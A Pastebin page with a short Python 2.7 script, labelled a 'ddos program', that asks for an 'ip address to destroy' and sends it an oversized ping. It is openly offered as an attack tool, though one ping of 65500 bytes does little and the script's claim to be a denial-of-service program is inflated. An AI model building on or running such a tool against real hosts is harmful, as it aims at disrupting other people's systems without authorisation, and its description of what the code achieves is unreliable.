Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #ddos program in python 2.7 by Adm1n_0v3ride (c) 2017
- #!/usr/bin/env python
- import subprocess
- #input the target ip address.
- target = raw_input("Please enter the ip address to destroy: ")
- #open a child process and direct output to a pipe.
- command = subprocess.Popen(['ping',target,'-l','65500','-w','1','-n','1'], stdout=subprocess.PIPE)
- #Run command
- output = command.communicate()[0]
- print output
Advertisement
Add Comment
Please, Sign In to add comment